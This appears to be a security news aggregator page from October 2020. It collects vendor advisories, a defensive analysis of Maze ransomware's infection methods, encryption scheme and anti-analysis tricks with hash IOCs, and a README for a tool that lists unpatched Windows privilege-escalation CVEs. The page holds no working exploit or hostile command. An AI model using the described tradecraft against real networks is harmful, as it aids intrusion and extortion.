The post 20 new Cisco security advisories for ASA and Firepower with CVSS>7: https://tools.cisco.com/security/center/publicationListing.x, (Wed, Oct 21st) appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/20-new-cisco-security-advisories-for-asa-and-firepower-with-cvss7-https-tools-cisco-com-security-center-publicationlisting-x-wed-oct-21st/?utm_source=rss&utm_medium=rss&utm_campaign=20-new-cisco-security-advisories-for-asa-and-firepower-with-cvss7-https-tools-cisco-com-security-center-publicationlisting-x-wed-oct-21st

Security Alert: Oracle Releases Critical Patch Update, October 2020

The post Security Alert: Oracle Releases Critical Patch Update, October 2020 appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/security-alert-oracle-releases-critical-patch-update-october-2020-2/?utm_source=rss&utm_medium=rss&utm_campaign=security-alert-oracle-releases-critical-patch-update-october-2020-2

Multi Factor Authentication for Remote Desktop Gateway and RDP Connections

Some or even your entire workforce might now be dispersed but their access to company networks still needs to be protected. Here we look at why a second factor of authentication is recommended to protect remote access. RDP Connections The Microsoft Remote Desktop Protocol (also known as RDP) is used to allow remote desktop to … Continued

The post Multi Factor Authentication for Remote Desktop Gateway and RDP Connections appeared first on Enterprise Network Security Blog from IS Decisions.

The post Multi Factor Authentication for Remote Desktop Gateway and RDP Connections appeared first on Security Boulevard.

The post Multi Factor Authentication for Remote Desktop Gateway and RDP Connections appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/multi-factor-authentication-for-remote-desktop-gateway-and-rdp-connections/?utm_source=rss&utm_medium=rss&utm_campaign=multi-factor-authentication-for-remote-desktop-gateway-and-rdp-connections

Life of Maze ransomware

In the past year, Maze ransomware has become one of the most notorious malware families threatening businesses and large organizations. Dozens of organizations have fallen victim to this vile malware, including LG, Southwire, and the City of Pensacola.

The history of this ransomware began in the first half of 2019, and back then it didn’t have any distinct branding – the ransom note included the title “0010 System Failure 0010”, and it was referenced by researchers simply as ‘ChaCha ransomware’.

Ransom note of an early version of Maze/ChaCha ransomware

Shortly afterwards, new versions of this Trojan started calling themselves Maze and using a relevantly named website for the victims instead of the generic email address shown in the screenshot above.

Website used by a recent version of Maze ransomware

Infection scenarios

Mass campaigns

The distribution tactic of the Maze ransomware initially involved infections via exploit kits (namely, Fallout EK and Spelevo EK), as well as via spam with malicious attachments. Below is an example of one of these malicious spam messages containing an MS Word document with a macro that’s intended to download the Maze ransomware payload.

If the recipient opens the attached document, they will be prompted to enable editing mode and then enable the content. If they fall for it, the malicious macro contained inside the document will execute, which in turn will result in the victim’s PC being infected with Maze ransomware.

Tailored approach

In addition to these typical infection vectors, the threat actors behind Maze ransomware started targeting corporations and municipal organizations in order to maximize the amount of money extorted.

The initial compromise mechanism and subsequent tactics vary. Some incidents involved spear-phishing campaigns that installed Cobalt Strike RAT, while in other cases the network breach was the result of exploiting a vulnerable internet-facing service (e.g. Citrix ADC/Netscaler or Pulse Secure VPN). Weak RDP credentials on machines accessible from the internet also pose a threat as the operators of Maze may use this flaw as well.

Privilege escalation, reconnaissance and lateral movement tactics also tend to differ from case to case. During these stages, the use of the following tools has been observed: mimikatz, procdump, Cobalt Strike, Advanced IP Scanner, Bloodhound, PowerSploit, and others.

During these intermediate stages, the threat actors attempt to identify valuable data stored on the servers and workstations in the compromised network. They will then exfiltrate the victim’s confidential files in order to leverage them when negotiating the size of the ransom.

At the final stage of the intrusion, the malicious operators will install the Maze ransomware executable onto all the machines they can access. This results in the encryption of the victim’s valuable data and finalizes the attack.

Data leaks/doxing

Maze ransomware was one of the first ransomware families that threatened to leak the victims’ confidential data if they refused to cooperate.

In fact, this made Maze something of a trendsetter because this approach turned out to be so lucrative for the criminals that it’s now become standard for several notorious ransomware gangs, including REvil/Sodinokibi, DoppelPaymer, JSWorm/Nemty/Nefilim, RagnarLocker, and Snatch.

The authors of the Maze ransomware maintain a website where they list their recent victims and publish a partial or a full dump of the documents they have managed to exfiltrate following a network compromise.

Website with leaked data published by Maze operators

Ransomware cartel

In June 2020, the criminals behind Maze teamed up with two other threat actor groups, LockBit and RagnarLocker, essentially forming a ‘ransomware cartel’. The data stolen by these groups now gets published on the blog maintained by the Maze operators.

It wasn’t just the hosting of exfiltrated documents where the criminals pooled their efforts – apparently they are also sharing their expertise. Maze now uses execution techniques that were previously only used by RagnarLocker.

Brief technical overview

The Maze ransomware is typically distributed as a PE binary (EXE or DLL depending on the specific scenario) which is developed in C/C++ and obfuscated by a custom protector. It employs various tricks to hinder static analysis, including dynamic API function imports, control flow obfuscation using conditional jumps, replacing RET with JMP dword ptr [esp-4], replacing CALL with PUSH + JMP, and several other techniques.

To counter dynamic analysis, this Trojan will also terminate processes typically used by researchers, e.g. procmon, procexp, ida, x32dbg, etc.

The cryptographic scheme used by Maze consists of several levels:

To encrypt the content of the victim’s files, the Trojan securely generates unique keys and nonce values to use with the ChaCha stream cipher;
The ChaCha keys and nonce values are encrypted by a session public RSA-2048 key which is generated when the malware is launched;
The session private RSA-2048 key is encrypted by the master public RSA-2048 key hardcoded in the Trojan’s body.

This scheme is a variation of a more or less typical approach used by developers of modern ransomware. It allows the operators to keep their master private RSA key secret when selling decryptors for each individual victim, and it also ensures that a decryptor purchased by one victim won’t help others.

When executing on a machine, Maze ransomware will also attempt to determine what kind of PC it has infected. It tries to distinguish between different types of system (‘backup server’, ‘domain controller’, ‘standalone server’, etc.). Using this information in the ransom note, the Trojan aims to further scare the victims into thinking that the criminals know everything about the affected network.

Strings that Maze uses to generate the ransom note

Fragment of the procedure that generates the ransom note

How to avoid and prevent

Ransomware is evolving day by day, meaning a reactive approach to avoid and prevent infection is not profitable. The best defense against ransomware is proactive prevention because often it is too late to recover data once they have been encrypted.

There are a number of recommendations that may help prevent attacks like these:

Keep your OS and applications patched and up to date.
Train all employees on cybersecurity best practices.
Only use secure technology for remote connection in a company local network.
Use endpoint security with behavior detection and automatic file rollback, such asKaspersky Endpoint Security for Business.
Use the latest threat intelligence information to detect an attack quickly, understand what countermeasures are useful, and prevent it from spreading.

Detection

Kaspersky products protect against this ransomware, detecting it as Trojan-Ransom.Win32.Maze; it is blocked by Behavior-based Protection as PDM:Trojan.Win32.Generic.

We safeguard our customers with the best Ransomware Protection technologies.

TIP Cloud Sandbox report summary and execution map with mapping on MITRE ATT&CK Framework

IOCs

2332f770b014f21bcc63c7bee50d543a
CE3A5898E2B2933FD5216B27FCEACAD0
54C9A5FC6149007E9B727FCCCDAFBBD4
8AFC9F287EF0F3495B259E497B30F39E

The post Life of Maze ransomware appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/life-of-maze-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=life-of-maze-ransomware

PatchChecker – Web-based check for Windows privesc vulnerabilities

This is the code base for the service running on: https://patchchecker.com. In short, PatchChecker is a web application (running on flask) that provides output similar to that of Watson. However, by using PatchChecker, one is not required to execute a binary on the target machine. Included in this project is also a web scraper that will automatically update the database for PatchChecker using information present on Microsoft sites, this allows for a more scalable and easier to use solution to the problem of finding CVEs to which a Windows system is (or is not) patched against. Additionally, any other CVEs can be added to the data collector input and checked for as long as they have an entry on https://portal.msrc.microsoft.com. You can also use this to get the data to update Watson.

Further information about this project can be found here or here (github.io mirror).

Using PatchChecker to check vulnerabilities:

To use the patchchecker, you can either go to the publicly hosted website here at patchchecker.com or you can git clone this repo, install the required libraries, makes sure patches.db is in the same directory as app.py, and then start the application with python3 ./app.py. Once the application is started you can open the included “index.html” file in a browser to actually use the service and get the list of patches to which the system being tested is vulnerable.
Additional information can be found here.

Getting KB data:

Expected input:

Expected output from webpage:

Expected output from webpage when vulnerabilities are found:

Alternatively, you can use a curl command and do something like this: Request:
note: you can use any delimiter you wish, I’m using spaces here:

curl 'https://patchchecker.com/checkprivs/' --data-raw 'wmicinfo=KB1231411 KB1231441 KB1234141&build_num=17763'

Response:
note: used some fake KBs so it’s showing vuln to everything, i.e. I have nothing installed
note: output is trunctated

{
    "total_vuln": 9,
    "kbs_parsed": [
        "KB1231411",
        "KB1231441",
        "KB1234141"
    ],
    "total_kbs_parsed": 3,
    "build": "17763",
    "results": [
        {
            "refs": [
                "https://exploit-db.com/exploits/46718",
                "https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/"
            ],
            "name": "CVE-2019-0836",
            "vulnerable": true
        }
                ]
}

To run the code in this repo yourself don’t forget to run: python3 -m pip install -r requirements.txt and run with python3. For reference, I used python 3.7.3.

Data Collection: patchdata_collector.py

The patchdata_collector.py the script is the pyppeteer scraper that iterates through several Microsoft sites to get the desired data for the cves specified in the --cve-list arg file. For an example of the expected format see the cves.txt file within the samples directory. Basically it’s a line-separated file with each line containing the following CVE-XXXX-XXXX|https://website.com/resource-pertaining-to-CVE,http://second_resource.comyou get the idea. An example of the resulting output can be found in the patches.db file included.
The code isn’t perfect but it gets the data and works for the time being. As reference, with 9 CVEs, it should take about 11 minutes to complete, YMMV.

patchdata_collector.py usage:

usage: patchdata_collector.py [-h] --cve-list CVE_LIST [--db DB] [--new-db] [-v]
                          [-vv] [--no-headless] [--json JSON]

optional arguments:
  -h, --help           show this help message and exit
  --cve-list CVE_LIST  line and pipe separated list containing CVEs and
                       related-URLs with information example: CVE-2020-1048|https://github.com/ionescu007/faxhell,https://github.com/ionescu007/PrintDemon
  --db DB              sqlite database filename
  --new-db             erases old database (if exists)
  -v                   set output to debug (verbose)
  -vv                  set output to annoying
  --no-headless        run browser with headless mode disabled
  --json JSON          json format output, argument should be json filename

Example run:

Running time ./patchdata_collector.py --cve-list cves.txt --db antest.db --new-db yields the following output:

2020-06-05 20:38:49.292 | INFO     | __main__:main:181 - Loaded 10 CVEs
2020-06-05 20:38:49.430 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-0836
2020-06-05 20:40:27.183 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1064
2020-06-05 20:41:07.158 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-0841
2020-06-05 20:41:31.675 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1130
2020-06-05 20:42:58.527 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1253
2020-06-05 20:43:25.069 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1315
2020-06-05 20:44:57.974 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1385
2020-06-05 20:45:22.026 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1388
2020-06-05 20:46:48.407 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1405
2020-06-05 20:48:07.026 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2020-1048
finished

real    11m27.793s
user    1m21.632s
sys     0m14.559s

The post PatchChecker – Web-based check for Windows privesc vulnerabilities appeared first on Hakin9 – IT Security Magazine.

The post PatchChecker – Web-based check for Windows privesc vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/patchchecker-web-based-check-for-windows-privesc-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=patchchecker-web-based-check-for-windows-privesc-vulnerabilities

VMware ESXi OpenSLP – Remote Code Execution Vulnerability (CERT-EU Security Advisory 2020-051)

On the 20th of October 2020, VMware released a security advisory for a vulnerability affecting ESXi OpenSLP, identified as CVE-2020-3992. OpenSLP as used in VMware ESXi has a use-after-free issue. VMware has evaluated the severity of this issue to be in the *critical severity range with a maximum CVSSv3 base score of 9.8 out of 10.
Read More

The post VMware ESXi OpenSLP – Remote Code Execution Vulnerability (CERT-EU Security Advisory 2020-051) appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/vmware-esxi-openslp-remote-code-execution-vulnerability-cert-eu-security-advisory-2020-051/?utm_source=rss&utm_medium=rss&utm_campaign=vmware-esxi-openslp-remote-code-execution-vulnerability-cert-eu-security-advisory-2020-051

More Effective Security Awareness: 3 Tips for NCSAM

It’s often said that humans are the weakest link in cybersecurity. Indeed, I’d have a hard time arguing that a computer that was sealed in a box, untouched by human hand, poses much of a security risk. But a computer that is unused has no purpose. It behooves security practitioners to get smarter about how […]… Read More

The post More Effective Security Awareness: 3 Tips for NCSAM appeared first on The State of Security.

The post More Effective Security Awareness: 3 Tips for NCSAM appeared first on Security Boulevard.

The post More Effective Security Awareness: 3 Tips for NCSAM appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/more-effective-security-awareness-3-tips-for-ncsam/?utm_source=rss&utm_medium=rss&utm_campaign=more-effective-security-awareness-3-tips-for-ncsam

How To Tackle the 5 Biggest Enterprise IoT Security Challenges

The proliferation of IoT devices, particularly in the workplace, has left businesses with a new set of security challenges to deal with. For any company considering investing in IoT devices, it is important to understand the nature of these challenges and how to address them. One of the biggest challenges to enterprise IoT adoption is..

The post How To Tackle the 5 Biggest Enterprise IoT Security Challenges appeared first on Security Boulevard.

The post How To Tackle the 5 Biggest Enterprise IoT Security Challenges appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/how-to-tackle-the-5-biggest-enterprise-iot-security-challenges/?utm_source=rss&utm_medium=rss&utm_campaign=how-to-tackle-the-5-biggest-enterprise-iot-security-challenges

Is Telco Cybersecurity the New Competitive Edge for Service Providers?

In my 20+ years working for and with telecommunication providers around the world, I’ve witnessed firsthand how the industry has evolved to offer continuously improved services to a wide audience of consumers. One of the most amazing things about this industry is that it provides essential connectivity service to every segment of society – from…

The post Is Telco Cybersecurity the New Competitive Edge for Service Providers? appeared first on Allot Blog.

The post Is Telco Cybersecurity the New Competitive Edge for Service Providers? appeared first on Security Boulevard.

The post Is Telco Cybersecurity the New Competitive Edge for Service Providers? appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/is-telco-cybersecurity-the-new-competitive-edge-for-service-providers/?utm_source=rss&utm_medium=rss&utm_campaign=is-telco-cybersecurity-the-new-competitive-edge-for-service-providers

HPSCI Takes Misinformation, Conspiracy Theories Hearing Online

The House Permanent Select Committee on Intelligence held a virtual hearing on the topic of Misinformation and Conspiracy Theories with an august panel of specialists well-steeped in how disinformation and misinformation are created, amplified and consumed. The hearing underscored misinformation and conspiracy as both domestic and international issues with respect to the United States. The..

The post HPSCI Takes Misinformation, Conspiracy Theories Hearing Online appeared first on Security Boulevard.

The post HPSCI Takes Misinformation, Conspiracy Theories Hearing Online appeared first on Malware Devil.

https://malwaredevil.com/2020/10/21/hpsci-takes-misinformation-conspiracy-theories-hearing-online/?utm_source=rss&utm_medium=rss&utm_campaign=hpsci-takes-misinformation-conspiracy-theories-hearing-online

Malware Devil

Wednesday, October 21, 2020

Malicious links shared via Facebook

Abuse of cross-site scripting vulnerability

Cloaking domains

Browser locker at the end of the chain

Indicators of Compromise

Malicious links shared via Facebook

Abuse of cross-site scripting vulnerability

Cloaking domains

Browser locker at the end of the chain

Indicators of Compromise

Tell us about Orasi and your core competencies.

What do you mean by ‘continuous data’?

Can you describe how you assess your client’s software pipeline?

What is the impact of continuous data as clients start to streamline processes?

You mentioned that you help clients improve not only processes and technologies, but also people and culture. How do you go about doing that?

Infection scenarios

Mass campaigns

Tailored approach

Data leaks/doxing

Ransomware cartel

Brief technical overview

How to avoid and prevent

Detection

IOCs

Using PatchChecker to check vulnerabilities:

Getting KB data:

Expected input:

Expected output from webpage:

Expected output from webpage when vulnerabilities are found:

Data Collection: patchdata_collector.py

patchdata_collector.py usage:

Example run:

Blog Archive

About Me